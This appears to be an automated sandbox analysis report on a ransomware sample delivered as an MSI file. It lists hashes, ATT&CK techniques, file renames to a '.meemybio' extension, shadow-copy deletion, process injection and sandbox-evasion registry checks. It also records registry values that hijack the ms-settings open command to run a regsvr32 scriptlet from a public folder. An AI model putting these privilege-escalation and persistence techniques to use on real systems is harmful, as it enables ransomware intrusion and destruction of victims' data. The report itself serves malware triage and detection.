9180fe1ea22b07841146ba483d454faf092c8cd9fed14222a08b7392cda2e7be

Analysis

max time kernel
292s
max time network
300s
platform
windows10-2004_x64
resource
win10v2004-20220414-en
submitted
23-05-2022 05:24

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

MAG.msi
Size

96KB
MD5

957d0c81c985609c580565a0323a14cd
SHA1

d8d46413409a14a1ae407107016e28074c6824d5
SHA256

9180fe1ea22b07841146ba483d454faf092c8cd9fed14222a08b7392cda2e7be
SHA512

0ff024ff07ab13e7d308429fd8906560e58610b63a7dd468f6b5b6c86221962dbc27e93090e5607104201e9cabe90b52affba54411a541f5c2f5369db231cf52

Score

9^/10

persistence ransomware

Malware Config

Signatures

Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490

Modifies extensions of user files 9 IoCs

Ransomware generally changes the extension on encrypted files.

ransomware

Processes:

MsiExec.exe

description	ioc	process
File renamed	C:\Users\Admin\Pictures\RemoveExport.tif => C:\Users\Admin\Pictures\RemoveExport.tif.meemybio	MsiExec.exe
File renamed	C:\Users\Admin\Pictures\SubmitUnregister.crw => C:\Users\Admin\Pictures\SubmitUnregister.crw.meemybio	MsiExec.exe
File renamed	C:\Users\Admin\Pictures\CompressSend.png => C:\Users\Admin\Pictures\CompressSend.png.meemybio	MsiExec.exe
File renamed	C:\Users\Admin\Pictures\ExportInitialize.png => C:\Users\Admin\Pictures\ExportInitialize.png.meemybio	MsiExec.exe
File renamed	C:\Users\Admin\Pictures\MountTest.png => C:\Users\Admin\Pictures\MountTest.png.meemybio	MsiExec.exe
File renamed	C:\Users\Admin\Pictures\PushConvertFrom.tif => C:\Users\Admin\Pictures\PushConvertFrom.tif.meemybio	MsiExec.exe
File renamed	C:\Users\Admin\Pictures\ImportTrace.tif => C:\Users\Admin\Pictures\ImportTrace.tif.meemybio	MsiExec.exe
File opened for modification	C:\Users\Admin\Pictures\StepOpen.tiff	MsiExec.exe
File renamed	C:\Users\Admin\Pictures\StepOpen.tiff => C:\Users\Admin\Pictures\StepOpen.tiff.meemybio	MsiExec.exe

Loads dropped DLL 1 IoCs

Processes:

MsiExec.exe

pid process

748 MsiExec.exe

pid	process
748	MsiExec.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

msedge.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000\Software\Microsoft\Windows\CurrentVersion\Run	msedge.exe

Enumerates connected drives 3 TTPs 48 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

msiexec.exemsiexec.exe

description	ioc	process
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\F:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\F:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe

Suspicious use of SetThreadContext 3 IoCs

Processes:

MsiExec.exe

description	pid	process	target process
PID 748 set thread context of 2384	748	MsiExec.exe	sihost.exe
PID 748 set thread context of 2396	748	MsiExec.exe	svchost.exe
PID 748 set thread context of 2492	748	MsiExec.exe	taskhostw.exe

Drops file in Program Files directory 2 IoCs

Processes:

setup.exe

description	ioc	process
File created	C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\b8d2acf9-a11f-4204-b537-d3e08c661f52.tmp	setup.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\20220523072615.pma	setup.exe

Drops file in Windows directory 9 IoCs

Processes:

msiexec.exe

description	ioc	process
File created	C:\Windows\Installer\inprogressinstallinfo.ipi	msiexec.exe
File created	C:\Windows\Installer\e57ba76.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\e57ba76.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIBC6A.tmp	msiexec.exe
File created	C:\Windows\Installer\SourceHash{ACB5AE58-BF5F-4C81-8759-EF28BCB9E5CA}	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIC322.tmp	msiexec.exe
File created	C:\Windows\Installer\e57ba78.msi	msiexec.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log	msiexec.exe
File opened for modification	C:\Windows\Installer\	msiexec.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Checks SCSI registry key(s) 3 TTPs 64 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

svchost.exevssvc.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\0016	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters	vssvc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\300A	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\000A	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0004	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0004	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0038	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0052	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\HardwareID	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0052	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\CompatibleIDs	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\0009	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2002	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0065	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0002	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0058	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\000A\	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\000A	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\0016	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Mfg	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0002	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0058	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004E	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0054	svchost.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters	vssvc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0018	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{3b2ce006-5e61-4fde-bab8-9b8aac9b26df}\0008	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004A	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004D	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\FriendlyName	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2003	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0003	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0064	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2002	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\0008	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0018	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{4340a6c5-93fa-4706-972c-7b648008a5a7}\0008	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Mfg	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\ConfigFlags	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0003	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\0008	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0054	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\CompatibleIDs	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0008	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Capabilities	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\0006	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Capabilities	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0005	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\DeviceDesc	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0004\	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\HardwareID	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0004	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0034	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0065	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0038	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0051	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0055	svchost.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

msedge.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Interacts with shadow copies 2 TTPs 6 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490

Processes:

vssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exe

pid process

800 vssadmin.exe
2308 vssadmin.exe
2464 vssadmin.exe
3900 vssadmin.exe
3736 vssadmin.exe
2820 vssadmin.exe
Modifies data under HKEY_USERS 1 IoCs

Processes:

svchost.exe

description ioc process

Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections svchost.exe

pid	process
800	vssadmin.exe
2308	vssadmin.exe
2464	vssadmin.exe
3900	vssadmin.exe
3736	vssadmin.exe
2820	vssadmin.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	svchost.exe

Modifies registry class 18 IoCs

Processes:

regsvr32.exeregsvr32.exeregsvr32.exesihost.exemsedge.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\ms-settings\shell\open	regsvr32.exe
Key created	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\ms-settings\shell\open\command	regsvr32.exe
Key created	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\ms-settings\shell	regsvr32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:../../../Users/Public/glvt6878zb"	regsvr32.exe
Key created	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\ms-settings	regsvr32.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.MicrosoftEdge.Stable_8wekyb3d8bbwe\WasEverActivated = "1"	sihost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\ms-settings\shell\open\command\DelegateExecute	regsvr32.exe
Key created	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\ms-settings\shell	regsvr32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\ms-settings\shell\open\command\DelegateExecute	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	msedge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\ms-settings\shell\open\command\DelegateExecute	regsvr32.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\WasEverActivated = "1"	sihost.exe
Key created	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\ms-settings\shell\open	regsvr32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:../../../Users/Public/glvt6878zb"	regsvr32.exe
Key created	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\ms-settings\shell\open\command	regsvr32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:../../../Users/Public/glvt6878zb"	regsvr32.exe
Key created	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\ms-settings\shell\open\command	regsvr32.exe
Key created	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\ms-settings	regsvr32.exe

Suspicious behavior: EnumeratesProcesses 14 IoCs

Processes:

msiexec.exeMsiExec.exemsedge.exemsedge.exeidentity_helper.exemsedge.exe

pid	process
2344	msiexec.exe
2344	msiexec.exe
748	MsiExec.exe
748	MsiExec.exe
4400	msedge.exe
4400	msedge.exe
4984	msedge.exe
4984	msedge.exe
4304	identity_helper.exe
4304	identity_helper.exe
264	msedge.exe
264	msedge.exe
264	msedge.exe
264	msedge.exe

Suspicious behavior: MapViewOfSection 3 IoCs

Processes:

MsiExec.exe

pid process

748 MsiExec.exe
748 MsiExec.exe
748 MsiExec.exe
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 5 IoCs

Processes:

msedge.exe

pid process

4984 msedge.exe
4984 msedge.exe
4984 msedge.exe
4984 msedge.exe
4984 msedge.exe

pid	process
748	MsiExec.exe
748	MsiExec.exe
748	MsiExec.exe

pid	process
4984	msedge.exe
4984	msedge.exe
4984	msedge.exe
4984	msedge.exe
4984	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

msiexec.exemsiexec.exevssvc.exe

description	pid	process
Token: SeShutdownPrivilege	5104	msiexec.exe
Token: SeIncreaseQuotaPrivilege	5104	msiexec.exe
Token: SeSecurityPrivilege	2344	msiexec.exe
Token: SeCreateTokenPrivilege	5104	msiexec.exe
Token: SeAssignPrimaryTokenPrivilege	5104	msiexec.exe
Token: SeLockMemoryPrivilege	5104	msiexec.exe
Token: SeIncreaseQuotaPrivilege	5104	msiexec.exe
Token: SeMachineAccountPrivilege	5104	msiexec.exe
Token: SeTcbPrivilege	5104	msiexec.exe
Token: SeSecurityPrivilege	5104	msiexec.exe
Token: SeTakeOwnershipPrivilege	5104	msiexec.exe
Token: SeLoadDriverPrivilege	5104	msiexec.exe
Token: SeSystemProfilePrivilege	5104	msiexec.exe
Token: SeSystemtimePrivilege	5104	msiexec.exe
Token: SeProfSingleProcessPrivilege	5104	msiexec.exe
Token: SeIncBasePriorityPrivilege	5104	msiexec.exe
Token: SeCreatePagefilePrivilege	5104	msiexec.exe
Token: SeCreatePermanentPrivilege	5104	msiexec.exe
Token: SeBackupPrivilege	5104	msiexec.exe
Token: SeRestorePrivilege	5104	msiexec.exe
Token: SeShutdownPrivilege	5104	msiexec.exe
Token: SeDebugPrivilege	5104	msiexec.exe
Token: SeAuditPrivilege	5104	msiexec.exe
Token: SeSystemEnvironmentPrivilege	5104	msiexec.exe
Token: SeChangeNotifyPrivilege	5104	msiexec.exe
Token: SeRemoteShutdownPrivilege	5104	msiexec.exe
Token: SeUndockPrivilege	5104	msiexec.exe
Token: SeSyncAgentPrivilege	5104	msiexec.exe
Token: SeEnableDelegationPrivilege	5104	msiexec.exe
Token: SeManageVolumePrivilege	5104	msiexec.exe
Token: SeImpersonatePrivilege	5104	msiexec.exe
Token: SeCreateGlobalPrivilege	5104	msiexec.exe
Token: SeBackupPrivilege	5088	vssvc.exe
Token: SeRestorePrivilege	5088	vssvc.exe
Token: SeAuditPrivilege	5088	vssvc.exe
Token: SeBackupPrivilege	2344	msiexec.exe
Token: SeRestorePrivilege	2344	msiexec.exe
Token: SeRestorePrivilege	2344	msiexec.exe
Token: SeTakeOwnershipPrivilege	2344	msiexec.exe
Token: SeRestorePrivilege	2344	msiexec.exe
Token: SeTakeOwnershipPrivilege	2344	msiexec.exe
Token: SeRestorePrivilege	2344	msiexec.exe
Token: SeTakeOwnershipPrivilege	2344	msiexec.exe
Token: SeRestorePrivilege	2344	msiexec.exe
Token: SeTakeOwnershipPrivilege	2344	msiexec.exe
Token: SeRestorePrivilege	2344	msiexec.exe
Token: SeTakeOwnershipPrivilege	2344	msiexec.exe
Token: SeRestorePrivilege	2344	msiexec.exe
